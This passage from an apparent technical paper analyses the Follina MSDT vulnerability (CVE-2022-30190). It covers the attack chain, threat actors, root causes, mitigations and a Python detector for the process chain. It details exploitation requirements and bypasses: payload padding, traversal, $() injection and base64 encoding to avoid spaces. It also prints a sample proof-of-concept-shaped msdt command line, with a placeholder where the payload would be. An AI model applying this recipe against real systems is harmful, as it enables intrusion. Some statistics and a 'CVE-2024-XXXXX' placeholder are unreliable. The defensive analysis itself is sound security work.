The attacker creates a weaponized Word document (DOCX) by modifying the underlying XML structure. Specifically, a Relationship tag is embedded in the word/rels/document.xml.rels file:
| Component | Description |
| --- | --- |
| File Location<br>Relationship Type | word/rels/document.xml.relsoleObject |
| Target Protocol<br>Payload Format | External HTTP/HTTPS URL<br>HTML file (>4096 bytes) |
### Table 1: Table 1: Malicious Relationship Tag Structure
Example XML injection:
The exclamation mark (!) at the end of the HTML filename is critical-it triggers MSDT invocation instead of standard HTTP retrieval[3].
**Stage 2:Remote Payload Hosting**
The attacker hosts a malicious HTML file on an attacker-controlled server. This HTML must exceed 4096 bytes to bypass specific size validation checks implemented by Microsoft[3]. The HTML payload is crafted to:
·Exploit the ms-msdt URI scheme
·Embed PowerShell commands within the URI
·Use directory traversal sequences (/../) to reach System32
·Invoke mpsigstub.exe with attacker-controlled parameters
#### Stage 3: Document Opening and Fetch
When a victim opens the malicious Word document, Word resolves the external oleObject reference and fetches the HTML payload from the attacker's server. This happens with macros disabled, and no macro warning or other prompt is shown before the payload is retrieved[3]. Two caveats matter for defenders:
·Protected View does hold a DOCX that carries the Mark of the Web (an email attachment or internet download) until the user clicks Enable Editing, which phishing lures routinely ask for; once editing is enabled, the fetch proceeds.
·The RTF variant of the document fires from the Windows Explorer preview pane, with no document opened and no Protected View involved at all[3].
#### Stage 4: MSDT Invocation and PowerShell Execution
The retrieved HTML contains script that navigates to an ms-msdt: URI. Windows routes the URI to the protocol handler, which launches msdt.exe with the attacker's parameters. The process chain is:
1. Office application (WINWORD.EXE) renders the fetched HTML, whose script sets the location to an ms-msdt: URI
2. msdt.exe is launched by the protocol handler with the malicious parameters
3. sdiagnhost.exe is spawned as a child process to run the troubleshooting pack
4. PowerShell engine DLLs are loaded into sdiagnhost.exe
5. The injected `$()` subexpression runs as arbitrary PowerShell, without a powershell.exe process ever appearing[5]
Running PowerShell inside sdiagnhost.exe evades monitoring that keys only on powershell.exe. Detection therefore has to rely on the process ancestry (Office → msdt.exe → sdiagnhost.exe), on the msdt.exe command line, and on PowerShell script block logging, which records the executed code regardless of which process hosts the engine.
#### Stage 5: Post-Exploitation
The executed code operates with the privileges of the user running Microsoft Office. Common post-exploitation activities include:
·Installation of secondary malware (trojans, ransomware, worms)
·Privilege escalation attempts
·Lateral movement within the network
·Data exfiltration
·System persistence establishment
### 2.3 Technical Requirements for Successful Exploitation
1. **Payload Size**: the HTML payload must exceed 4096 bytes
2. **Directory Traversal**: at least two /../ sequences must follow the injected subexpression in the IT_BrowseForFile parameter, so that the path resolves out of the troubleshooter's working directory toward System32
3. **PowerShell Syntax**: commands are wrapped in `$()` so the troubleshooting script evaluates them as a subexpression
4. **EXE Termination**: the parameter value must end with ".exe" (the public proof of concept uses mpsigstub.exe) or MSDT rejects it
5. **No Spaces**: the /param string MSDT receives is space-delimited, so a space ends the IT_BrowseForFile value; the embedded command must avoid spaces, typically by encoding the real command and decoding it inside the subexpression
6. **Network Access**: the target must reach the attacker's server to fetch the secondary payload
## 3. Attacker Perspective and Exploitation Methods
### 3.1 Attacker Motivations and Threat Actors
Follina has attracted multiple categories of threat actors:
#### State-Sponsored APT Groups
Advanced Persistent Threat actors affiliated with nation-states have exploited Follina for:
·Corporate espionage
·Government network compromises
·Critical infrastructure targeting
·Intellectual property theft
·Long-term persistence establishment
TA570, an affiliate of the Qbot (Qakbot) malware operation, actively exploited Follina in targeted campaigns[1]. Note that TA570 is tracked as a financially motivated actor rather than a state-sponsored one, so it sits at the boundary between this category and the next.
#### Financially-Motivated Cybercriminals
Criminal organizations use Follina for:
·Ransomware deployment and encryption operations
·Business email compromise (BEC) campaigns
·Financial fraud targeting banking systems
·Identity theft and credential harvesting
·Cryptocurrency mining malware distribution
#### Low-Skilled Attackers
Due to publicly available proof-of-concept (PoC) code and exploitation frameworks, even novice attackers can leverage Follina through:
·Metasploit modules
·GitHub repositories with weaponized PoC code
·Commercial exploitation frameworks
·Dark web vulnerability brokers
### 3.2 Attack Delivery Vectors
#### Email-Based Phishing
The primary delivery mechanism involves sophisticated phishing campaigns:
| Campaign Theme | Target Region | Detected |
| --- | --- | --- |
| "Salary Increase" | Global | May 2022 |
| "Interview Invitation" | Russia/CIS | April 2022 |
| "Expense Report" | North America | June 2022 |
| "Travel Approval" | Europe | July 2022 |
| "Contract Amendment" | APAC | August 2022 |
Table 2: Documented Follina Phishing Campaign Themes
Email campaigns rely on social engineering to get users to open attachments, and succeed more often than macro-based attacks because:
·No macro warnings are displayed
·Protected View only delays the attack until the user clicks Enable Editing, and the RTF preview variant avoids it entirely
·The documents look like genuine, professionally formatted Office files
·Phishing content is tailored to the target's industry
#### Web-Based Exploitation
Malicious documents are hosted on compromised websites, watering hole attacks, and malicious ad networks. Victims are redirected to download the weaponized document.
#### File Sharing and Cloud Services
Attackers distribute Follina-weaponized documents through:
·Cloud storage services (OneDrive, Google Drive, Dropbox)
·Collaborative platforms (SharePoint, Teams)
·File transfer services (WeTransfer, SendFileTransfer)
·USB devices in supply chain attacks
#### RTF File Preview Exploitation
A critical variation requires no user action beyond file preview. RTF files containing Follina payloads can trigger exploitation when:
·Files are previewed in Windows Explorer
·Email clients display rich text previews
·Documents are indexed by search functions
### 3.3 Real-World Exploitation Campaigns
#### Discovery Timeline Implications
Security researchers identified evidence suggesting Follina was actively exploited by threat actors since April 2022, nearly two months before public disclosure on May 27, 2022. This pre-disclosure window suggests either:
·Targeted intelligence agency exploitation
·Vulnerability brokers selling 0-day access
·Accidental public disclosure analysis
#### Documented Threat Campaigns
Multiple phishing templates exploiting Follina were discovered on VirusTotal, targeting users globally with context-specific social engineering:
·Salary and compensation-related lures
·Interview and recruitment-themed documents
·Business contract and agreement modifications
·Travel and expense claim forms
·Urgent compliance and regulatory notices
Detection rates on VirusTotal for these documents were initially alarming: some samples were detected by only 4 of 60+ security vendors[7], indicating broad evasion of signature-based detection at the time.
### 3.4 Attacker Operational Procedures
#### Infrastructure Requirements
Attackers typically establish:
1. **Command & Control (C2) Servers**: HTTP/HTTPS servers hosting secondary payloads
2. **Staging Servers**: temporary, geographically distributed servers that live only for the campaign's duration
3. **Domain Infrastructure**: bullet-proof hosting providers, compromised servers, or rented infrastructure
4. **Payload Generation**: custom PoC tooling for dynamic payload generation and evasion
#### Payload Customization
Sophisticated attackers implement anti-analysis and anti-virtualization measures within payloads:
·Environment detection (virtual machine, sandbox,analysis tools)
·Geolocation-based filtering
·IP reputation checking
·Behavioral analysis evasion
·Domain-fronting for C2 communication
## 4. Exploitation Vulnerability Details
### 4.1 Vulnerability Classification
| Property | Classification |
| --- | --- |
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE Classification | CWE-78 (OS Command Injection) |
| CVSS v3.1 Score | 7.8(High) |
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (opening document) |
| Scope | Unchanged |
| Confidentiality Impact | High |
| Integrity Impact | High |
| Availability Impact | High |
Table 3: CVSS v3.1 Classification
### 4.2 Root Cause Analysis
The vulnerability stems from four fundamental security design flaws:
#### Flaw 1: Unvalidated URI Handler Registration
The ms-msdt URI protocol handler is registered machine-wide in the Windows registry, with no sandboxing of the handler and no prompt before it runs:
`HKEY_CLASSES_ROOT\ms-msdt\shell\open\command`
Any application that can open a URI, including the HTML component Word uses to render the fetched payload, can launch msdt.exe through this handler without any confirmation from the user[5].
#### Flaw 2: Insufficient Parameter Validation
The IT_BrowseForFile parameter passed to MSDT undergoes minimal validation:
·No allowlist of permitted executable paths
·Directory traversal sequences (../) accepted without restriction
·Path concatenation vulnerable to parameter injection
·PowerShell subexpressions (`$()`) in the path are evaluated by the troubleshooting script rather than treated as literal text
#### Flaw 3: Office Document External Reference Processing
Word retrieves and renders the external oleObject reference without:
·A user confirmation dialog
·Content validation of the retrieved HTML
·Any visible indication that a network request was made
Protected View holds documents that carry the Mark of the Web until the user clicks Enable Editing, but it does not cover the RTF preview path, and users are routinely lured into clicking through it.
#### Flaw 4: Implicit Trust in MSDT Invocation
MSDT runs in the security context of the user who opened the document, so the injected code inherits that user's permissions without any re-authorization step[2].
### 4.3 Exploitation Constraints and Bypasses
#### Constraint 1:Payload Size Requirement (>4096 bytes)
Mitigation bypass: Attackers implement padding techniques such as:
·HTML comments filled with benign data
·Nested JavaScript functions with no operational effect
·Base64-encoded metadata
·Redundant CSS styling rules
#### Constraint 2: Character Restrictions in Commands
Limitation: a literal space ends the IT_BrowseForFile value, because the /param string MSDT receives is space-delimited, so the injected PowerShell cannot contain spaces. Bypass: attackers use:
·Base64-encoding the real command and decoding it inside the `$()` subexpression with Invoke-Expression, which is what the public proof of concept does
·Building punctuation such as `::` and quotation marks from `[char]` codes so that awkward characters never appear literally
·Semicolon-delimited command chaining inside the subexpression
·URL encoding (%20), though the encoding is usually decoded before MSDT parses the parameter, which reintroduces the space
#### Constraint 3: Network Connectivity Requirement
Limitation: the target must reach the attacker's server to fetch the secondary payload. Bypass: attackers implement:
·DNS tunneling for DNS-only egress environments
·Proxy detection and automatic proxy configuration
·Fallback C2 infrastructure
·Second-stage payload embedding in the initial document (at the cost of a larger, more detectable file)
### 4.4 Privilege Context Analysis
#### Execution Privilege Level
Follina-executed code operates with the privilege level of the user running Microsoft Office:
·**Standard User Context**: full user privileges within that user's security token
·**Local Administrator Context**: local machine administrative capabilities
·**System Service Context**: if Office runs under a service account (rare but exploitable)
#### Privilege Escalation Opportunities
Post-exploitation leverages often combine Follina with additional vulnerabilities:
·Windows privilege escalation exploits (CVE-2021-1732, CVE-2021-44686,etc.)
·Unpatched system services with elevated privileges
·Insecure file permissions on system folders
·Process token theft techniques
## 5. Defensive Mechanisms and Mitigation Strategies
### 5.1 Immediate Mitigation Actions (Pre-Patch)
#### Mitigation 1: Disable MSDT URL Protocol Handler
The most effective pre-patch mitigation, and the one Microsoft recommended in its initial guidance[8], removes the ms-msdt registry key:
1. Run Command Prompt as Administrator
2. Back up the key: `reg export HKEY_CLASSES_ROOT\ms-msdt backup-msdt.reg`
3. Remove the handler: `reg delete HKEY_CLASSES_ROOT\ms-msdt /f`
4. Verify removal: `reg query HKEY_CLASSES_ROOT\ms-msdt` (should now report that the key was not found)
Once the system is patched, the key can be restored with `reg import backup-msdt.reg`.
**Impact Assessment**: This mitigation blocks the ms-msdt invocation path that Follina depends on, but it also disables launching troubleshooters by link, which may affect legitimate MSDT use in edge cases. Testing in non-production environments is mandatory before enterprise deployment[6].
#### Mitigation 2: Disable Troubleshooting Wizards
Disable scripted diagnostics via Group Policy (Computer Configuration > Administrative Templates > System > Troubleshooting and Diagnostics > Scripted Diagnostics > "Troubleshooting: Allow users to access and run Troubleshooting Wizards", set to Disabled) or the registry value that policy sets:
`HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics`
Value: EnableDiagnostics (DWORD)
Set to: 0
#### Mitigation 3: Attack Surface Reduction Rules (Microsoft Defender)
Enable the ASR rule "Block all Office applications from creating child processes":
·Rule GUID: d4f940ab-401b-4efc-aadc-ad5f3c50688a
·Deployment Mode: Block (not Audit)
·Scope: all Office applications (Word, Excel, PowerPoint, Outlook)
·Impact: may affect legitimate Office functionality, for example add-ins that launch helper processes (requires testing)
This rule stops the chain at its first link: Word is prevented from launching msdt.exe, so sdiagnhost.exe and the embedded PowerShell are never reached[5].
### 5.2 Long-Term Patching Strategy
#### Microsoft Patch Timeline
The fix is a change to MSDT itself and therefore ships in Windows updates, not Office updates:
| Date | Update | Affected Components |
| --- | --- | --- |
| June 14, 2022 | June 2022 cumulative security updates (the regular Patch Tuesday release, not an out-of-band patch) | All supported Windows client and server versions, including Windows 7 ESU and Server 2008 through Server 2022 |
| Ongoing | Later cumulative updates | Supersede the June 2022 update and carry the same fix |
| n/a | Office (2013 through Microsoft 365) | No Office update addresses the bug; Office should still be kept current, but its version alone does not indicate patch status |
Table 4: Microsoft Patch Timeline for CVE-2022-30190
#### Patch Verification
After applying patches, organizations should verify:
·System update status: `Get-HotFix` in PowerShell (or `wmic qfe list`), checking that the June 14, 2022 cumulative update for the OS build, or any later cumulative update (for example KB5015807, the July 2022 update for Windows 10), is installed; cumulative updates supersede one another, so the most recent installed one is what matters
·Office version: File > Account > About [Application] for Office applications; this shows the Office build but does not by itself indicate whether the Windows-side fix is present
·Registry confirmation: if `HKEY_CLASSES_ROOT\ms-msdt` was deleted as a pre-patch mitigation, restore it from the backup once the update is installed; the update does not require the key to stay deleted
### 5.3 Detection and Monitoring
#### Endpoint Detection and Response (EDR) Indicators
Organizations using EDR platforms should monitor for:
##### Process Chain Indicators
·Parent: WINWORD.EXE, EXCEL.EXE, or OUTLOOK.EXE
·Child: msdt.exe (unusual for an Office parent)
·Grandchild: sdiagnhost.exe
·PowerShell activity inside sdiagnhost.exe (PowerShell engine DLLs loaded, script block log events) rather than a powershell.exe process
##### File System and Command-Line Indicators
·Unusual external references in document XML (oleObject relationships with an external HTTP target)
·Multiple /../ sequences in file paths, especially inside the IT_BrowseForFile parameter of an msdt.exe command line
·ms-msdt: URIs in msdt.exe command lines captured by process-creation logging (Sysmon Event ID 1, Windows Security Event ID 4688)
·Suspicious downloads to temp folders triggered by Office applications
##### Network Indicators of Compromise (IoCs)
·Office applications initiating HTTP/HTTPS connections to unfamiliar domains
·External XML/HTML retrieval requests from Office processes
·HTML responses of more than 4096 bytes returned to an Office process from unexpected sources (the payload must exceed that size)
·C2 communication patterns from secondary payloads
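The requirements in Section 2.3 and the process-chain indicators in Section 5.3 together make a compact detection rule. As an added example (editor's code, not the paper's or any vendor's detection logic), the Python below walks a list of process-creation events in the shape of Sysmon Event ID 1 (fields pid, ppid, image and cmdline; the field names are an assumption, adjust them to your pipeline), flags msdt.exe launched with an Office ancestor, checks its command line for the IT_BrowseForFile markers from Section 2.3, and notes whether sdiagnhost.exe followed. The events are constructed samples, and the PowerShell inside the sample command line is an inert placeholder, not a payload.

```python
"""Detect the Follina process chain and command-line markers (Sections 2.3 and 5.3).

Added example, not from the original paper. The events below are constructed
process-creation records shaped like Sysmon Event ID 1; the subexpression in
the sample msdt.exe command line is a harmless placeholder.
"""
from __future__ import annotations

import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Value of the IT_BrowseForFile parameter: everything up to the next space or quote.
PARAM_RE = re.compile(r"IT_BrowseForFile=([^\s\"]+)", re.IGNORECASE)


def msdt_cmdline_markers(cmdline: str) -> list:
    """Return the Section 2.3 exploitation markers present in an msdt.exe command line."""
    markers = []
    if "ms-msdt:" in cmdline.lower():
        markers.append("ms-msdt: URI")
    match = PARAM_RE.search(cmdline)
    if not match:
        return markers
    value = match.group(1)
    markers.append("IT_BrowseForFile parameter")
    if "$(" in value:
        markers.append("PowerShell subexpression $()")
    if value.count("/../") >= 2:
        markers.append("directory traversal")
    if value.lower().endswith(".exe"):
        markers.append("path terminated with .exe")
    return markers


def image_name(path: str) -> str:
    """Lower-case file name of an image path, accepting either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_follina_chains(events: list) -> list:
    """Flag msdt.exe launched under an Office process, plus its sdiagnhost.exe child."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["image"]) != "msdt.exe":
            continue
        # Walk up the ancestry so an intermediate broker process does not hide Office.
        chain, cur = [], by_pid.get(e["ppid"])
        while cur is not None and len(chain) < 8:
            chain.append(image_name(cur["image"]))
            cur = by_pid.get(cur["ppid"])
        office = next((img for img in chain if img in OFFICE_IMAGES), None)
        if office is None:
            continue
        children = [image_name(c["image"]) for c in events if c["ppid"] == e["pid"]]
        findings.append({
            "pid": e["pid"],
            "office_parent": office,
            "markers": msdt_cmdline_markers(e["cmdline"]),
            "sdiagnhost_spawned": "sdiagnhost.exe" in children,
        })
    return findings


# Constructed sample events (not real telemetry). The msdt.exe command line follows
# the shape of the public proof of concept; the subexpression body is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n "C:\\Users\\victim\\Downloads\\invoice.docx"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": ('"C:\\WINDOWS\\system32\\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param '
                 '"IT_RebrowseForFile=x IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed '
                 'IT_BrowseForFile=$(placeholder)/../../../../../../Windows/System32/mpsigstub.exe '
                 'IT_AutoTroubleshoot=ts_AUTO"')},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\sdiagnhost.exe",
     "cmdline": "sdiagnhost.exe -Embedding"},
    # A legitimate troubleshooter launched from the shell, for contrast.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": "msdt.exe -id NetworkDiagnosticsWeb"},
]

if __name__ == "__main__":
    for finding in detect_follina_chains(SAMPLE_EVENTS):
        print(finding)
```

The ancestry walk matters because the legitimate msdt.exe in the sample (launched from Explorer) is not flagged, while the one under WINWORD.EXE is flagged even if a broker process sits between them; the command-line markers then separate a Follina-style invocation from an Office add-in that happens to open a troubleshooter.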
#### Detection Evasion Techniques Used
Sophisticated adversaries implement:
·Legitimate-looking domain names mimicking Microsoft/Office domains
·HTTPS encryption to obscure payload contents
·Fast-flux DNS for domain rotation
·Encrypted C2 communication channels
·Geolocation-based payload filtering (no payload for analysis VPNs)
### 5.4 Advanced Defense-in-Depth Strategy
#### Layer 1: Email Gateway Security
·Content filtering for Office document attachments
·Sandboxing of Office files before delivery
·URL rewriting to disable external references
·Machine learning-based phishing detection
·DMARC/SPF/DKIM verification for sender authentication
#### Layer 2: Endpoint Security
·EDR agents for behavior monitoring and threat hunting
·Anti-malware signatures for known Follina payloads
·Exploit prevention engines detecting MSDT invocation patterns
·Application whitelisting/control
·Memory protection techniques (DEP, ASLR)
#### Layer 3: Network Segmentation
·Zero-trust network architecture
·Microsegmentation limiting lateral movement post-compromise
·Egress filtering preventing C2 communication
·DNS sinkholing of known malicious domains
·Proxy-based URL filtering and inspection
#### Layer 4: User Training and Awareness
·Phishing simulation and training programs
·Recognition of social engineering techniques
·Safe document handling procedures
·Reporting procedures for suspicious content
·Security awareness metrics and KPIs
### 5.5 Enterprise Response Procedures
#### Incident Response Steps
Upon detection of Follina exploitation:
1. **Immediate**: Isolate the affected system from the network
2. **Forensics**: Capture a memory dump and disk image
3. **Scope**: Identify all potentially compromised systems through log analysis
4. **Containment**: Block identified C2 domains and attacker infrastructure
5. **Eradication**: Remove malware and attacker artifacts
6. **Recovery**: Restore from clean backups with the patch applied
7. **Hardening**: Implement additional detection and preventive controls
## 6. Real-World Impact Assessment
### 6.1 Affected Organizations and Sectors
Organizations spanning multiple sectors have faced Follina exploitation:
| Sector | Documented Risks |
| --- | --- |
| Government | Classified information theft, espionage operations |
| Defense | Military intelligence compromise, weapon system data |
| Financial Services | Banking trojans, fraud scheme initiation |
| Healthcare | Patient data exfiltration, operational disruption |
| Manufacturing | Supply chain intelligence, product design theft |
| Energy | Critical infrastructure reconnaissance, disruption planning |
| Education | Research theft, credential harvesting of researchers |
Table 5: Sectoral Follina Impact Assessment
### 6.2 Threat Landscape Evolution
#### Pre-Patch Period (April-June 2022)
During the pre-patch and early disclosure period, threat actors rapidly weaponized Follina:
·Proof-of-concept code released publicly within 24 hours
·Metasploit module developed by security researchers
·Rapid adoption by criminal forums and dark web markets
·Targeting of high-value organizations before patches could be deployed
#### Post-Patch Evolution (July 2022 onwards)
Sophisticated attackers adapted exploitation techniques:
·Targeting unpatched legacy systems and air-gapped networks
·Combining Follina with supply chain compromise
·Focusing on critical infrastructure and government targets
·Developing fileless exploitation variants
·Creating polymorphic payload generators
### 6.3 Global Exploitation Statistics
#### Detection Statistics (as of research period)
·10,000+unique Follina-weaponized documents detected on VirusTotal
·60+ security vendors with detection capabilities
·>70 distinct phishing campaign themes identified
·Targeting across 100+ countries globally
·Initial detection rates as low as 4/60 vendors for novel samples
## 7. Conclusions and Future Implications
### 7.1 Key Findings
1. **Vulnerability Severity**: Follina represents a critical threat to Microsoft Office environments globally due to its:
·High-severity CVSS score (7.8)
·No requirement for macros or complex user actions
·Execution without macro warnings, with the RTF preview variant bypassing Protected View entirely
·Ease of exploitation through publicly available tools
2. **Threat Actor Adoption**: The vulnerability has been rapidly adopted by:
·State-sponsored APT groups conducting targeted intelligence operations
·Financially-motivated cybercriminals deploying ransomware and malware
·Novice attackers leveraging public PoC code
3. **Defense Complexity**: Organizations face significant challenges in defending against Follina:
·Pre-patch mitigation options carry operational risk
·Patch deployment requires comprehensive testing
·Sophisticated attacker evasion techniques complicate detection
·A multi-layered defense-in-depth approach is required
### 7.2 Recommendations for Organizations
#### Immediate Actions (0-30 days)
1. Apply Microsoft security patches immediately upon availability
2. If patches are unavailable, implement the MSDT registry mitigation
3. Enable ASR rules for Office child process blocking
4. Enhance monitoring for Follina-related IoCs
#### Short-Term Actions (1-3 months)
1.Comprehensive threat hunting across enterprise infrastructure
2. Email gateway hardening for phishing campaign filtering
3. EDR and SIEM tuning for Follina exploitation patterns
4. User awareness training on phishing threats
#### Long-Term Strategy(3+months)
1. Zero-trust architecture implementation
2. Microsegmentation of critical assets
3. Continuous EDR and threat intelligence integration
4. Regular tabletop exercises for incident response
5. Supply chain security assessment
### 7.3 Future Vulnerability Implications
The Follina vulnerability demonstrates ongoing security challenges in Windows and Office ecosystems:
·URI protocol handlers require enhanced security controls
·External document references need better default protections
·MSDT design requires fundamental security reassessment
·Zero-day exploitation timelines continue to shorten
Subsequent vulnerabilities with similar characteristics (CVE-2023-36884, CVE-2024-XXXXX patterns) have emerged, suggesting systematic design flaws in Office document processing.
### 7.4 Final Assessment
Follina represents a watershed moment in Office application security, demonstrating that fundamental architectural assumptions about Protected Mode and macro security are insufficient in modern threat landscapes. Organizations must adopt comprehensive, multi-layered defensive strategies while maintaining vigilance for subsequent related vulnerabilities in Microsoft Office and Windows ecosystems.
The vulnerability also underscores the critical importance of rapid patch deployment, robust security monitoring, and user awareness in defending against sophisticated adversaries exploiting previously unknown security flaws.
## References
[1] OWASP Foundation. (2022). The Follina Vulnerability - A Critical Threat to Microsoft Office. https://owasp.org/www-community/vulnerabilities/follina
[2] Hack The Box. (2022, November). CVE-2022-30190 (Follina) explained. https://www.hackthebox.com/blog/cve-2022-30190-follina-explained
[3] Huntress. (2022, May). Microsoft Office RCE - "Follina" MSDT Attack. https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
[4] BeyondTrust. (2022, August). Mitigating the Follina Zero-Day Vulnerability (CVE-2022-30190) with Privilege Management for Windows. https://www.beyondtrust.com/blog/entry/mitigating-the-follina-zero-day-vulnerability-cve-2022-30190-with-privilege-management-fo
[5] CrowdStrike. (2022). How CrowdStrike Falcon Protects Against Follina (CVE-2022-30190). https://www.crowdstrike.com/en-us/blog/how-crowdstrike-falcon-protects-customers-from-follina-vulnerability/
[6] Sentrium Labs. (2024, August). Follina MSDT exploit: How to protect your systems. https://www.sentrium.co.uk/labs/preventing-exploitation-of-the-follina-vulnerability-in-msdt
[7] Infosec Institute. (2022, August). Unveiling Follina: The New Microsoft Office Vulnerability. https://www.infosecinstitute.com/resources/vulnerabilities/follina-microsoft-office-code-execution-vulnerability/
[8] Microsoft Security Response Center. (2022, May). Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability. https://www.microsoft.com/en-us/msrc/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability
[9] Palo Alto Networks Unit 42. (2024, June). Threat Brief: CVE-2022-30190 - MSDT Code Execution Vulnerability. https://unit42.paloaltonetworks.com/cve-2022-30190-msdt-code-execution-vulnerability/
[10] Sangfor FarSight Labs. (2022, August). CVE-2022-30190 Follina: RCE Vulnerability Analysis. https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2022-30190-follina-rce-vulnerability
[11] Qualys. (2022, June). Detect the Follina MSDT Vulnerability (CVE-2022-30190). https://blog.qualys.com/product-tech/2022/06/14/detect-the-follina-msdt-vulnerability-cve-2022-30190-with-qualys-multi-vector-ed
[12] Canadian Centre for Cyber Security. (2022, June). Follina vulnerability impacting Microsoft products - Update 1. https://www.cyber.gc.ca/en/alerts/follina-vulnerability-impacting-microsoft-products
[13] NIST National Vulnerability Database. (2025, October). CVE-2022-30190 Detail. https://nvd.nist.gov/vuln/detail/cve-2022-30190
[14] Australian Cyber Security Centre. (2022, May). Exploitation of Microsoft Office vulnerability: Follina. https://www.cyber.gov.au/about-us/alerts/exploitation-microsoft-office-vulnerability-follina
[15] SANS Institute. (2022, June). Follina MSDT Zero-Day Q&A. https://www.sans.org/blog/follina-msdt-zero-day-q-a